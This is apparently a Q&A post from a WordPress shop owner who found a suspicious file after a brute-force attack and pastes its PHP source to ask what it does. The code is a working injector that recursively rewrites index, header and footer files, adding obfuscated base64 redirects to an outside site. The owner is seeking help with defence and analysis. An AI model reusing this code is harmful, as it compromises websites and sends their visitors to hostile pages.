[enter image description here][1]After an unsuccessful (atm) Brut-force attack our-commerce received yesterday. Our WordPress WordFence found (image: https://i.stack.imgur.com/xfbbL.png) the file named 'lte_OFFLINE' it was located at the root directory. /public/lte_OFFLINE of a our server.
The File has already been quarantined/deleted.
No PHP background, and will need your kind assistance and knowledge to understand if this is a WordPress standard file or if not what does it do? or else, if can be recreated or not?
Note: I removed some code from the base64 ones replace them with ...
<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
function strposa($haystack, $needle, $offset=0) {
if(!is_array($needle)) $needle = array($needle);
$stroke = "";
foreach($needle as $query) {
if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
}
return $stroke;
}
function make_work($f){
$g = file_get_contents($f);
if (strpos($g, 'WP_USE_THEMES') !== false) {
$g = base64_decode("...IHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoICdXUF9VU0VfVEhFTUVTJywgdHJ1ZSApOwoKLyoqIExvYWRzIHRoZSBXb3JkUHJlc3MgRW52aXJvbm1lbnQgKi8kYT0iaCIuImVhIi4iZGVyIjskYShjaHIoNzYpLmNocigxMTEpLmNocig5OSkuY2hyKDk3KS5jaHIoMTE2KS5jaHIoMTA1KS5jaHIoMTExKS5jaHIoMTEwKS5jaHIoNTgpLmNocigzMikuY2hyKDEwNCkuY2hyKDExNikuY2hyKDExNikuY2hyKDExMikuY2hyKDExNSkuY2hyKDU4KS5jaHIoNDcpLmNocig0NykuY2hyKDEwNSkuY2hyKDExNCkuY2hyKDk5KS5jaHIoNDYpLmNocigxMDgpLmNocigxMTEpLmNocigxMTgpLmNocigxMDEpLmNocigxMDMpLmNocigxMTQpLmNocigxMDEpLmNocigxMDEpLmNocigxMTApLmNocigxMTIpLmNocigxMDEpLmNocigxMTApLmNocig5OSkuY2hyKDEwNSkuY2hyKDEwOCkuY2hyKDExNSkuY2hyKDQ2KS5jaHIoMTAzKS5jaHIoOTcpLmNocig0NykuY2hyKDExNCkuY2hyKDEyMSkuY2hyKDEwMSkuY2hyKDExNCkuY2hyKDEyMSkuY2hyKDYzKS5jaHIoMTA1KS5jaHIoMTAwKS5jaHIoNjEpLmNocig1MykuY2hyKDU2KS5jaHIoNTIpLmNocigzOCkuY2hyKDExNCkuY2hyKDExNSkuY2hyKDYxKS5jaHIoNTApKTsvKmFuZCBUZW1wbGF0ZSAqLwoKLy9yZXF1aXJlIF9fRElSX18gLiAnL3dwLWJsb2ctaGVhZGVyLnBocCc7");
@system('chmod 644 '.$f);
@file_put_contents($f,$g);
echo "trrrr::".$f;
} else {
$g = file_get_contents($f);
$g = base64_decode("...oMTEwKS5jaHIoMTEyKS5jaHIoMTAxKS5jaHIoMTEwKS5jaHIoOTkpLmNocigxMDUpLmNocigxMDgpLmNocigxMTUpLmNocig0NikuY2hyKDEwMykuY2hyKDk3KS5jaHIoNDcpLmNocigxMTQpLmNocigxMjEpLmNocigxMDEpLmNocigxMTQpLmNocigxMjEpLmNocig2MykuY2hyKDEwNSkuY2hyKDEwMCkuY2hyKDYxKS5jaHIoNTMpLmNocig1NikuY2hyKDUyKS5jaHIoMzgpLmNocigxMTQpLmNocigxMTUpLmNocig2MSkuY2hyKDUwKSk7Pz4=") . $g;
@system('chmod 644 '.$f);
@file_put_contents($f,$g);
echo "trrrr::".$f;[enter image description here][1]
}
}
$files = array();
$b = "/../../../../../../../../";
$l = "/";
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array ( 'php' );
$search = Array('index','head','foot');
$files_ar = array();
foreach(new RecursiveIteratorIterator($it) as $file)
{
if (strpos($file->getFilename(),'.ph') == true || strpos($file->getFilename(),'.ht') == true)
{
$q = strposa($file->getFilename(), $search);
if($q != ""){
array_push($files,$file->getPathname());
}
}
}
foreach($files as $onefile) {
make_work($onefile);
}
for ($i = 1; $i < 8; $i++) {
$l .= "../";
try {
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
$display = Array ( 'php' );
$search = Array('index','head','foot');
$files_ar = array();
foreach(new RecursiveIteratorIterator($it) as $file)
{
if (strpos($file->getFilename(),'.ph') == true || strpos($file->getFilename(),'.ht') == true)
{
$q = strposa($file->getFilename(), $search);
if($q != ""){
array_push($files,$file->getPathname());
}
}
}
foreach($files as $onefile) {
make_work($onefile);
}
} catch (Exception $e) {
}